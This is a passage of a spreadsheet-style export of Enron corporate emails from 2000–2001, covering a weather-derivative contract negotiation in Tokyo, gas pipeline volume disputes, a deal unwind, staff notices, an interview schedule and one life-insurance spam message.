organization who have been involved to date in gathering the legal data we_x000D_
have accumulated in relation to the legal issues associated with the_x000D_
trading of weather derivatives here._x000D_
_x000D_
I am attaching our latest proposal for your consideration.  I still need to_x000D_
get sign off from our head of legal in London this evening on this drafting_x000D_
but do not expect any problems._x000D_
_x000D_
In the interests of time I have not set out our reasoning here.  I think_x000D_
Mr. Wani is very familiar with the various issues both on the part of your_x000D_
client and on our part.  If, however, your client is not willing to accept_x000D_
this language and needs us to explain our reasoning in detail I would like_x000D_
to arrange a meeting to be attended by Mr. Wani, our lawyers at Tokyo_x000D_
Aoyama Law Offices, me and your client to resolve these issues._x000D_
_x000D_
On the other issue, we think JPY1,000,000 would be far more appropriate_x000D_
than JPY1,000,000,000._x000D_
_x000D_
Finally, we will negotiate the ISDA master with your client separately but_x000D_
will not accept the argument at that time that because we agreed to_x000D_
Japanese law in this confirmation, we should agree then.  At this stage no_x000D_
further discussion need take place on this point._x000D_
_x000D_
Jane McBride_x000D_
Senior Legal Counsel_x000D_
Enron Japan Corp._x000D_
_x000D_
Otemachi 1st Square Bldg._x000D_
West 11th Floor_x000D_
1-5-1 Otemachi, Chiyoda-ku_x000D_
Tokyo 100-0004_x000D_
Japan_x000D_
_x000D_
Tel.:       81-3-5219-4500 (Main)_x000D_
              81-3-5219-4553 (Direct)_x000D_
Fax:       81-3-5219-4510_x000D_
_x000D_
Assistant (Maggy Yamanishi)_x000D_
Tel.:        81-3-5219-4554_x000D_
Email:      Yo.Yamanishi@enron.com_x000D_
_x000D_
_x000D_
_x000D_
                    "Izumi Sato"_x000D_
                    &lt;isato@mywm.c        To:     &lt;Jane.McBride@enron.com&gt;_x000D_
                    o.jp&gt;                cc:     &lt;Ono_T@toare.co.jp&gt;,_x000D_
&lt;wani@mywm.co.jp&gt;,_x000D_
                                         &lt;Morten.E.Pettersen@enron.com&gt;_x000D_
                    10/19/2000           Subject:     RE: ToaRe_x000D_
documentation_x000D_
                    08:04 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Ms. McBride,_x000D_
_x000D_
Our answer is as follows:_x000D_
_x000D_
1. We have no comments on this point._x000D_
_x000D_
2. As to clause 5(c)(i) and the amended (iii), we have no objection._x000D_
However_x000D_
it is our opinion that both of the parties represent and warrant each_x000D_
other._x000D_
As to (ii), we are informed by Mr. Ono that this transaction does not come_x000D_
under (ii) for ToaRe as its purpose is not hedging. If ToaRe represents and_x000D_
warrants as clause 5(c)(ii), it is false representation and warranty._x000D_
Clause_x000D_
5(c)(ii) therefore should be deleted._x000D_
We think clause 5(c)(iii) is a good enough representation to clear the_x000D_
gambling matter._x000D_
_x000D_
3. It is our opinion that Japanese law is better for our client in the ISDA_x000D_
Master._x000D_
_x000D_
4.Our suggestion is JPY1,000,000,000._x000D_
_x000D_
5. As this is the practical matter, we have no comments._x000D_
_x000D_
We apologize for the delay._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Akihiro Wani / Izumi Sato_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jane.McBride@enron.com [mailto:Jane.McBride@enron.com]_x000D_
Sent: Wednesday, October 18, 2000 9:02 PM_x000D_
To: isato@mywm.co.jp_x000D_
Cc: Ono_T@toare.co.jp; wani@mywm.co.jp; Morten.E.Pettersen@enron.com_x000D_
Subject: Re: ToaRe documentation_x000D_
_x000D_
_x000D_
_x000D_
Dear Ms. Sato,_x000D_
_x000D_
I am enclosing an amended draft (clean) of the confirmation for your final_x000D_
approval.  Please let me know if you have any trouble reading it with the_x000D_
redlining._x000D_
_x000D_
You will note:_x000D_
_x000D_
1.   We have amended the FRWS.  This has been done in consultation with_x000D_
your client so I don't expect this to be a problem._x000D_
2.   We cannot give the warranties in clause 5(c).  We also do not accept_x000D_
your client's reasons for not giving the warranties to us but as_x000D_
alternative to paragraph (iii), would suggest you warrant the legality of_x000D_
your entering into of the contract.  We trust you can have no objections to_x000D_
this new warranty.  In our opinion, the analysis you have suggested in_x000D_
relation to paragraph (ii) is relevant only in the context of a credit_x000D_
derivative and not a weather derivative so would ask that this be retained._x000D_
3.   We have agreed to Japanese law but only on the understanding that your_x000D_
client will agree to New York law (or UK law if they prefer) for the ISDA_x000D_
which we will start negotiating as soon as this confirmation is finalized_x000D_
and on the basis that you accept our amended form of clause 5._x000D_
4.   Pls make a suggestion for the purposes of the figure in 6(a)(1)._x000D_
5.   We are also willing to accommodate you on clause 13 and will revert_x000D_
with this language tomorrow._x000D_
_x000D_
Jane McBride_x000D_
Senior Legal Counsel_x000D_
Enron Japan Corp._x000D_
_x000D_
Otemachi 1st Square Bldg._x000D_
West 11th Floor_x000D_
1-5-1 Otemachi, Chiyoda-ku_x000D_
Tokyo 100-0004_x000D_
Japan_x000D_
_x000D_
Tel.:       81-3-5219-4500 (Main)_x000D_
              81-3-5219-4553 (Direct)_x000D_
Fax:       81-3-5219-4510_x000D_
_x000D_
Assistant (Maggy Yamanishi)_x000D_
Tel.:        81-3-5219-4554_x000D_
Email:      Yo.Yamanishi@enron.com_x000D_
_x000D_
_x000D_
(See attached file: Weather-HDD-Floor-OTC-ToaRejmb2000-10-17.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 08:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Please map GD ANR OK</t>
  </si>
  <si>
    <t>IF ANR/OK</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 11:03:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'francesc.guillen@enron.com', 'manning.paula@enron.com', 'ronggen.pan@enron.com', 'junellen.pearsall@enron.com', 'angela.hylton@enron.com', 'david.woodstrom@enron.com', 'joel.bennett@enron.com', 'hopley.george@enron.com', 'matt.smith@enron.com', 'souad.mahmassani@enron.com', 'nate.blackburn@enron.com', 'sean.boyle@enron.com', 'e-mail &lt;.ehab@enron.com&gt;', 'virawan.yawapongsiri@enron.com', 'e-mail &lt;.kathleen@enron.com&gt;', 'lauren.schlesinger@enron.com', 'chris.hyde@enron.com', 'chrissy.grove@enron.com', 'steve.nat@enron.com', 'eddie.zhang@enron.com', "justin.o'malley@enron.com", 'tara.piazze@enron.com', 'yan.wang@enron.com', 'neeran.pathak@enron.com', 'sabina.rank@enron.com', 'catherine.woolgar@enron.com', 'massimo.marolo@enron.com', 'biliana.pehlivanova@enron.com', 'e-mail &lt;.leslie@enron.com&gt;', 'lindon.chiu@enron.com', 'jason.jones@enron.com', 'denver.plachy@enron.com', 'sachin.gandhi@enron.com', 'kathryn.pallant@enron.com', 'vladi.pimenov@enron.com', 'amanda.huble@enron.com', 'bart.burk@enron.com', 'e-mail &lt;.natalie@enron.com&gt;', 'varun.garg@enron.com', 'chuck.ames@enron.com', 'david.dronet@enron.com', 'mog.heu@enron.com', 'd.alexander@enron.com', 'brugh.jennifer@enron.com', 'dipak.agawalla@enron.com', 'kyle.berryman@enron.com', 'jennie.pai@enron.com', 'paul.cline@enron.com', 'jennifer.fraser@enron.com', 'hotmail.lindon@enron.com', 'abhijeet.naik@enron.com', 'e-mail &lt;.monika@enron.com&gt;', 'stuart.reed@enron.com', 'chris.gaskill@enron.com', 'catalina.cardenas@enron.com'})</t>
  </si>
  <si>
    <t>FW: happy hour tonight</t>
  </si>
  <si>
    <t>Anyone interested in Slainte (509 Main St.) after work ..... ? 4pm (for the lucky ones) onwards !!!_x000D_
_x000D_
-Colin_x000D_
_x000D_
http://www.slainteirishpub.com/frames/fr.html_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fraser, Jennifer  _x000D_
Sent:	Friday, April 20, 2001 12:45 PM_x000D_
To:	Tonks, Colin; Kelly, Mike E.; Frank, Matthew; Shim, Elizabeth; Dyk, Russell; Powell, Andy_x000D_
Subject:	happy hour tonight_x000D_
_x000D_
Join us at Slainte  4 pm on_x000D_
_x000D_
Jen Fraser_x000D_
Enron Global Markets Fundamentals_x000D_
713-853-4759</t>
  </si>
  <si>
    <t>Thu, 3 Aug 2000 02:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Richard, we need to deal with this..._x000D_
----- Forwarded by Dan Lyons/HOU/ECT on 08/03/2000 09:27 AM -----_x000D_
_x000D_
	fordb@winstim.com_x000D_
	08/03/2000 08:32 AM_x000D_
		 _x000D_
		 To: kneisler@llgm.com_x000D_
		 cc: Tmoore@llgm.com, dan.lyons@enron.com, rquinn@tenaska.com_x000D_
		 Subject: Re: Brazos Cert Filing_x000D_
_x000D_
_x000D_
Kirsten,_x000D_
_x000D_
I now have Brazos' cert petition.  Do you want me to send it to someone in _x000D_
your_x000D_
D.C. office, or does it go to Paul Hastings?_x000D_
_x000D_
Bart_x000D_
_x000D_
_x000D_
_x000D_
_______________________________________x000D_
This message, together with any attachments, is intended only for the_x000D_
use of the individual or entity to which it is addressed and may contain_x000D_
information that is legally privileged, confidential and exempt from_x000D_
disclosure.  If you are not the intended recipient, you are hereby_x000D_
notified that any dissemination, distribution, or copying of this_x000D_
message,or any attachment, is strictly prohibited.  If you have received_x000D_
this message in error, please notify the original sender (or the WSPR_x000D_
Help Desk) immediately by telephone (212-858-1000) or by return_x000D_
E-mail and delete the message, along with any attachments, from_x000D_
your computer.  Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 10:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Dave:_x000D_
Here is the latest copy of the backoffice services presentation._x000D_
Ben_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 09:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michel.nelson@enron.com', 'dave.neubauer@enron.com', 'robert.kilmer@enron.com', 'jerry.peters@enron.com', 'john.shafer@enron.com', 'robert.hayes@enron.com', 'phil.lowry@enron.com', 'jerry.d.martin@enron.com', 'mike.mcgowan@enron.com', 'mary.miller@enron.com', 'james.saunders@enron.com', 'dan.pribble@enron.com', 'drew.fossum@enron.com', 'john.keller@enron.com', 'steve.hotte@enron.com', 'shelley.corman@enron.com', 'dorothy.mccoppin@enron.com', 'steven.harris@enron.com', 'randy.rice@enron.com', 'rod.hayslett@enron.com', 'james.prentice@enron.com', 'gary.smith@enron.com', 'joe.hartsoe@enron.com', 'danny.mccarty@enron.com', 'bill.cordes@enron.com'})</t>
  </si>
  <si>
    <t>May 16 ETS Half Day Staff Meeting CANCELED</t>
  </si>
  <si>
    <t>This is to advise you that we have canceled next Wednesday's ETS Half Day _x000D_
Staff Meeting.    Our next meeting is scheduled for Wednesday, August 15, _x000D_
from 8:30AM to 1:00PM in 49C2.    We are taking a summer break to accommodate _x000D_
vacation schedules._x000D_
_x000D_
Don't hesitate to call me if you have any questions or concerns with this _x000D_
notice._x000D_
_x000D_
Thanks,_x000D_
Cindy</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 05:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Folks..._x000D_
We are also out in position manager for Saturday at Mead 230 because of the _x000D_
LV Cogen sale going RT._x000D_
_x000D_
---------------------- Forwarded by Bill Williams III/PDX/ECT on 03/16/2001 _x000D_
01:05 PM ---------------------------_x000D_
_x000D_
_x000D_
Stanley Cocke_x000D_
03/16/2001 01:00 PM_x000D_
To: Portland Shift_x000D_
cc: Cara Semperger/PDX/ECT@ECT, Stacy Runswick/PDX/ECT@ECT, Mark _x000D_
Fisher/EWC/Enron@Enron, Tom Alonso/PDX/ECT@ECT, Jeremy Morris/PDX/ECT@ECT, _x000D_
Jeff Richter/HOU/ECT@ECT, Carla Hoffman/PDX/ECT@ECT _x000D_
_x000D_
Subject: Position Manager at Mead230_x000D_
_x000D_
Just wanted to let everyone know that we will be out in position manager for _x000D_
Sunday, 3/18.  We're out a total of 102MW, 17MW for HE11-16.  This is an LV _x000D_
Cogen schedule that is going real-time._x000D_
_x000D_
Thanks,_x000D_
Stan_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 08:12:44 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: RE: Daily Volumes For Midwest Natural Gas</t>
  </si>
  <si>
    <t xml:space="preserve">FYI. Lynn_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Rice, Tom &lt;Tom.Rice@ENRON.com&gt;_x000D_
To: Anderson, Gary E. &lt;Gary.Anderson@ENRON.com&gt;; Zadow, Raetta &lt;Raetta.Zadow@ENRON.com&gt;; Lachapelle, Donna &lt;Donna.LaChapelle@ENRON.com&gt;; Stewart, Angeline &lt;Angeline.Stewart@ENRON.com&gt;; Farmington-Pipeline, Team &lt;Team.Farmington-Pipeline@ENRON.com&gt;_x000D_
CC: Blair, Lynn &lt;Lynn.Blair@ENRON.com&gt;; Dietz, Rick &lt;Rick.Dietz@ENRON.com&gt;; Floyd, Jodie &lt;Jodie.Floyd@ENRON.com&gt;; Craddock, Larry &lt;Larry.Craddock@ENRON.com&gt;_x000D_
Sent: Mon Oct 29 07:09:52 2001_x000D_
Subject: RE: Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
I believe this generated $75 worth of discretion with Midwest Gas.  Unless I am not seeing something here, I don't feel as though investing dollars to install EFM or Bullhorn would be a good idea.   _x000D_
_x000D_
Tom_x000D_
_x000D_
	 -----Original Message-----_x000D_
	From: 	Anderson, Gary E.  _x000D_
	Sent:	Thursday, October 25, 2001 8:17 AM_x000D_
	To:	Zadow, Raetta; Lachapelle, Donna; Stewart, Angeline; Farmington-Pipeline, Team; Rice, Tom_x000D_
	Cc:	Blair, Lynn; Dietz, Rick; Floyd, Jodie_x000D_
	Subject:	RE: Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
	The charts from these locations are not received in time to process for the 5th work day close, so these daily volumes are determined systematically based on the beginning and ending index readings. Even if they were, it is impossible to determine daily volume consumption from a 31day chart. Even decreasing the chart rotation is not a solution unless charts are received by the third work day to allow sufficient time for processing. The answer is to install EFM or possibly a Bullhorn unit to determine the actual daily index readings so that the daily quantities are accurately determined.. On these types of installations, how can we assess penalties on anything other than monthly quantities ? NNG has several locations where the existing equipment does not meet today?s business needs, so we probably need to determine where these deficiencies exists, and identify the costs to resolve the problem._x000D_
	Thanks-_x000D_
	Gary_x000D_
_x000D_
			 -----Original Message-----_x000D_
			From: 	Zadow, Raetta  _x000D_
			Sent:	Tuesday, October 09, 2001 9:04 AM_x000D_
			To:	Anderson, Gary E.; Lachapelle, Donna; Stewart, Angeline; Farmington-Pipeline, Team; Rice, Tom_x000D_
			Cc:	Blair, Lynn; Dietz, Rick; Floyd, Jodie; Zadow, Raetta_x000D_
			Subject:	FW: Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
			Gary, was wondering if you could help us out. Scott has told me that they have 31 day charts for the stations listed below and he was wondering why we couldn't read those so as to get daily volumes rather than taking the total for the month and dividing it by the number of days in the month to get the daily volume.  The reason for this is because, especially in the winter time, this can become very crucial when we calculate the penalty invoices which are done daily and are based on the differences between the daily physical volumes and the volumes that the shippers have scheduled on our pipe.  If these charts cannot be read daily, what can we do to make it so that they can. Could you please check to find out what we need to do in order to have accurate daily volumes for these stations._x000D_
_x000D_
			Thanks,_x000D_
_x000D_
			Raetta_x000D_
_x000D_
			 -----Original Message-----_x000D_
			From: 	Farmington-Pipeline, Team  _x000D_
			Sent:	Monday, October 08, 2001 9:55 AM_x000D_
			To:	Zadow, Raetta_x000D_
			Subject:	Re: Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
				Raetta, here are the stations  numbers.  Thanks for your help. Scott 612-270-8501_x000D_
				Arcadia 747-051-01,02_x000D_
				Eleva 747-161_x000D_
				Independance 747-221_x000D_
				Mondovi 747-341-01,02_x000D_
				Strum 747-411_x000D_
				Whitehall #1 747-921_x000D_
				Whitehall #3 747-923_x000D_
_x000D_
_x000D_
_x000D_
				 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
				Team Farmington-Pipeline_x000D_
				06/22/2001 07:58 AM_x000D_
				To:	Raetta Zadow/ET&amp;S/Enron@ENRON_x000D_
				cc:	Tom Rice/ET&amp;S/Enron@ENRON, Bob Stevens/ET&amp;S/Enron, Angeline Stewart/GPGFIN/Enron, Diana Porter/ET&amp;S/Enron@ENRON, Jodie Floyd/ET&amp;S/Enron@ENRON, Raetta Zadow/ET&amp;S/Enron@ENRON _x000D_
_x000D_
				Subject:	Re: Daily Volumes For Midwest Natural Gas   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
				Thanks for looking into this for me Raetta.  I talked to Jim Banker this week and asked for him to check and see if they were charged for any penalty gas or not.  He said that he would let me know if they had.  He also stressed that we still need to see the actual daily volumes instead of average daily volumes on the volume statements.  I'm not quit sure if this part of the problem has been addressed yet or not.  Please let me know. Thanks Scott  _x000D_
_x000D_
_x000D_
				 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
				Raetta Zadow_x000D_
				06/15/2001 04:43 PM_x000D_
				To:	Team Farmington-Pipeline/ET&amp;S/Enron@ENRON_x000D_
				cc:	Tom Rice/ET&amp;S/Enron@ENRON, Bob Stevens/ET&amp;S/Enron, Angeline Stewart/GPGFIN/Enron, Diana Porter/ET&amp;S/Enron@ENRON, Jodie Floyd/ET&amp;S/Enron@ENRON, Raetta Zadow/ET&amp;S/Enron@ENRON _x000D_
_x000D_
				Subject:	Re: Daily Volumes For Midwest Natural Gas   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
				I have looked at the DDVC invoices for Midwest for March, 2001 which total $304.70.  The SMS charges amount to $76.30 but the biggest part of the invoice is the negative DDVC charge which is for $228.40  - this occurred on March 26.  I was wondering if the Midwest Natural Gas people could let us know what they think the volumes should be on those specific wells that they are concerned about for the 26th and then if necessary, we could make those corrections.  Please let me know if there is anything else that I can do to help._x000D_
_x000D_
				Thanks,_x000D_
_x000D_
				Raetta_x000D_
_x000D_
_x000D_
_x000D_
				 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
				Team Farmington-Pipeline_x000D_
				06/14/2001 03:04 PM_x000D_
				To:	Tom Rice/ET&amp;S/Enron@ENRON, Bob Stevens/ET&amp;S/Enron, Raetta Zadow/ET&amp;S/Enron@ENRON, Angeline Stewart/GPGFIN/Enron, Diana Porter/ET&amp;S/Enron@ENRON_x000D_
				cc:	 _x000D_
_x000D_
				Subject:	Daily Volumes For Midwest Natural Gas_x000D_
_x000D_
				I recently met with Jim Banker with Midwest Natural Gas from Whitehall, Wi.  He informed me that he had some concerns about whether or not he was being charged for penalty gas for daily volumes.  He showed me some gas volume statements that he recieved from GMS.  I believe it was the month of March Statement.  What the statement showed is average daily volumes instead of the actual volumes per day. (Ex. At  Eleva TBS Days 1 and 2 showed 122 MCF and Days 3-31  showed 118 MCF.)  These are charted stations with 31 day charts.  The stations that he is concerned about are Arcadia, Eleva, Independance, Mondovi, Strum, Whitehall #1,and  Whitehall #3.  Any assistance or knowledge that you can provide me would be greatly appreciated.  Thanks Scott 612-270-8501_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 11:42:06 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'scott.mills@enron.com', 'wayne.vinson@enron.com', 'kristin.albrecht@enron.com'})</t>
  </si>
  <si>
    <t>American Express</t>
  </si>
  <si>
    <t>Donnie/Kristin/Scott/Narsimha_x000D_
_x000D_
Origination has instructed us to unwind this deal due to a Material Adverse Change clause tied to our Credit Rating.  The contract has been reviewed and we will dispute their interpretation.  In any event, we should unwind effective immediately.  Please show me what the unwind value is 1) at our mids and 2) at our bids.  We typically unwind at bids but given the circumstances and size of the exposure I may make an exception.  I anticipate an unwind loss in the amount of -$4.5 -  -$5.0 MM.  The negative unwind value is a result of credit clauses/non-uniform contract provision and, as such, should be passed back to Origination.  I would expect Origination to handle any futher pass-through to Credit directly with Credit.  I have made Origination/Legal aware of our cost pass-through. _x000D_
_x000D_
Thanks for your help,_x000D_
Rogers</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 16:19:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'globe_life@customoffers.com'})</t>
  </si>
  <si>
    <t>$1.00 starts up to $20,000.00 of Life Insurance!</t>
  </si>
  <si>
    <t>_x000D_
[IMAGE]	  Date: October 12, 2001  Recipient: Patrice last_name;  Selection No.: 5537-GL0923-679591 Status:  Activation Required Administrative  Authorization Approved 	_x000D_
	No Physical Exam Required! Life Insurance that can never be cancelled once issued!	_x000D_
		_x000D_
	Patrice, out of millions of people you have been selected to receive Life Insurance, Guaranteed for Life. No physical exam required and no agent will come to your door. You are not obligated in any way. The day your policy is issued Patrice, you will be covered immediately and your benefit amount can never be reduced. 	_x000D_
		_x000D_
 Patrice, we will not cancel your policy  due to changes in age, health or occupation. And you get a 30 day money back guarantee  if you are not completely satisfied.   So act now , Patrice, before its too late! $1.00 is all it takes to get you started.   P.S. Don't wait a minute longer! Get up  to $20,000 of Life Insurance, guaranteed  to stay the same for life, click here!     [IMAGE]  I have been selected to receive Life Insurance, guaranteed forlife. Please send me my information packet today!  	 [IMAGE] 	_x000D_
	 Globe Life And Accident Insurance Company Policy Forms as applicable by state or GMPRTO term life in Oregon (FL only, Ray Bryant Resident Florida Agent) This policy has some exclusions available to New York residents from First United American Life Insurance Company. 	_x000D_
_x000D_
_x000D_
If the above links do not work or appear, simply copy this URL and paste it into your browser's address field: http://web1.customoffers.com/click.asp?lnk=869&amp;email=PMIMS@ENRON.COM _x000D_
_x000D_
Your privacy is extremely important to us. You requested to receive this mailing, by registering at  CustomOffers.com or by subscribing through one of our marketing partners. As a leader in permission-based email marketing, we are committed to delivering a highly rewarding experience, with offers that include bargains, entertainment, and  money-making ideas. However, if you wish to unsubscribe, click here  or link to http://web1.customoffers.com/unsubscribe.asp?emid=520 Third-party offers contained in this email are the sole responsibility of the offer originator. [IMAGE]</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 03:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David W Delainey/HOU/ECT on 11/14/2000 _x000D_
11:12 AM ---------------------------_x000D_
_x000D_
_x000D_
jalatorr@enron.com on 11/14/2000 10:50:54 AM_x000D_
To: ddelain2@enron.com_x000D_
cc:  _x000D_
Subject: Approval for reviewer_x000D_
_x000D_
_x000D_
ALATORRE,JAIME   has suggested reviewers and submitted them for your _x000D_
approval.  You may review/modify this list of reviewers by logging on to PEP _x000D_
at http://pep.corp.enron.com  and going to Supervisor Services.  Please _x000D_
remember, no feedback can be completed on ALATORRE,JAIME   until you have _x000D_
approved the list._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 05:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Credit Report--1/25/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 02/02/2001 _x000D_
01:52 PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Veronica Espinoza @ ENRON                                              _x000D_
               01/25/2001 09:49 AM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Larry Joe Hunter/HOU/ECT@ECT, Bob Bowen/HOU/ECT@ECT, Kim S _x000D_
Theriot/HOU/ECT@ECT, Melinda Whalen/CAL/ECT@ECT, Dianne Seib/CAL/ECT@ECT, _x000D_
Janie Aguayo/HOU/ECT@ECT, Derek Bailey/Corp/Enron@ENRON, Kevin _x000D_
Meredith/Corp/Enron@ENRON, Ellen Wallumrod/NA/Enron@ENRON, Celeste _x000D_
Cisneros/NA/Enron@Enron, Diane Anderson/NA/Enron@Enron, Tiffany _x000D_
Williams/NA/Enron@Enron, Cindy Feldman/CAL/ECT@ECT, Patricia _x000D_
Boulanger/CAL/ECT@ECT, Linda Sietzema/CAL/ECT@ECT, Sharon _x000D_
Crawford/CAL/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Tanya _x000D_
Rohauer/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, _x000D_
Russell Diamond/HOU/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, Nidia _x000D_
Mendoza/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, _x000D_
David Baumbach/HOU/ECT@ECT, Errol McLaughlin/Corp/Enron@ENRON, Darron C _x000D_
Giron/HOU/ECT@ECT, Walter Guidroz/NA/Enron@Enron, Leslie Reeves/HOU/ECT@ECT, _x000D_
Veronica Gonzalez/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Credit Report--1/25/01_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 02:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'clarissa.garcia@enron.com'})</t>
  </si>
  <si>
    <t>HI 235 - December</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Townsend/HOU/ECT on 11/29/2000 10:42 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Billyoung3@aol.com on 11/29/2000 08:22:37 AM_x000D_
To: nferrie@enron.com, victoria.versen@enron.com, judy.townsend@enron.com_x000D_
cc:  _x000D_
Subject: HI 235 - December_x000D_
_x000D_
_x000D_
Just a reminder that our day 1-7 volumes at HI 235 will be zero due to _x000D_
Transco Shut in. They have a boat in the field and our understanding is that _x000D_
the repairs are on schedule._x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 14:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'jeffrey.shankman@enron.com', 'john.lavorato@enron.com', 'hunter.shively@enron.com', 'david.delainey@enron.com', 'kevin.hannon@enron.com', 'john.arnold@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>Interview for 4/23/2001 (Greg Shea)</t>
  </si>
  <si>
    <t>Thank you for assisting with the interview process for Greg Shea on Monday, April 23, 2001.  Below please find a copy of the scheduled itinerary for Mr. Shea.  _x000D_
_x000D_
As a reminder, he is interviewing for the position of VP of Gas Trading in Calgary reporting to Rob Milnthorp.  He intends to bring his resume with him on his visit Monday._x000D_
_x000D_
10:30 - 11:00		Greg Whalley EB3322_x000D_
11:15 - 12:00		Hunter Shively EB3316_x000D_
12:00 - 01:30		John Lavorato EB3308_x000D_
01:30 - 02:00		Jeff Shankman EB3330_x000D_
02:00 - 02:45		Kevin Hannon EB4508_x000D_
03:00 - 03:30		Louise Kitchen EB3314_x000D_
03:30 - 04:30		Dave Delainey EB0884_x000D_
04:30 - 05:00		John Arnold EB3316_x000D_
_x000D_
If you have any questions, please feel free to contact myself or John Lavorato at x37991._x000D_
_x000D_
Kim Hillis_x000D_
30681</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 06:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>update on Union Carbide safety net gas</t>
  </si>
  <si>
    <t xml:space="preserve">Aimee, _x000D_
_x000D_
I have updated deal 15765 in Sitara for this change effective today._x000D_
_x000D_
D_x000D_
---------------------- Forwarded by Daren J Farmer/HOU/ECT on 12/20/2000 _x000D_
02:14 PM ---------------------------_x000D_
From: Lee L Papayoti on 12/20/2000 11:42 AM_x000D_
To: Daren J Farmer/HOU/ECT@ECT, Gary A Hanks/HOU/ECT@ECT, James _x000D_
McKay/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: update on Union Carbide safety net gas_x000D_
_x000D_
got a call last night from Carbide - they rescinded the change from 14,000/d _x000D_
rate to 6,000/d rate for safety net gas that was due 9am this morning. _x000D_
_x000D_
So here's where we should be now with Carbide:_x000D_
_x000D_
Seadrift - no saftey net, just the 10,000/d baseload deal_x000D_
_x000D_
Texas City - 10,000/d of the term deal, plus 14,000/d of safety net, total _x000D_
24,000/d_x000D_
_x000D_
call with questions_x000D_
_x000D_
Lee_x000D_
3.5923_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 02:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: EPRM Article</t>
  </si>
  <si>
    <t>Hi Vince,_x000D_
_x000D_
I'm wondering if you got this last week? If you could have a quick look and_x000D_
get back to me with any comments that would be great - Robin is chasing me_x000D_
on this one!_x000D_
_x000D_
Best regards._x000D_
_x000D_
Chris._x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: Chris Strickland &lt;chris@lacima.co.uk&gt;_x000D_
To: &lt;VKaminski@aol.com&gt;_x000D_
Sent: Wednesday, December 06, 2000 4:16 AM_x000D_
Subject: EPRM Article_x000D_
_x000D_
_x000D_
&gt; Hi Vince,_x000D_
&gt;_x000D_
&gt; Hope things are fine with you. I'm sorry that I only ever write to you_x000D_
when_x000D_
&gt; I'm after something, but could you look at this simulation article - the_x000D_
&gt; next installment in the EPRM articles._x000D_
&gt;_x000D_
&gt; Many thanks and best regards._x000D_
&gt;_x000D_
&gt; Chris._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; ----- Original Message -----_x000D_
&gt; From: &lt;VKaminski@aol.com&gt;_x000D_
&gt; To: &lt;Vince.J.Kaminski@enron.com&gt;; &lt;Les@lacima.co.uk&gt;;_x000D_
&lt;chris@lacima.co.uk&gt;;_x000D_
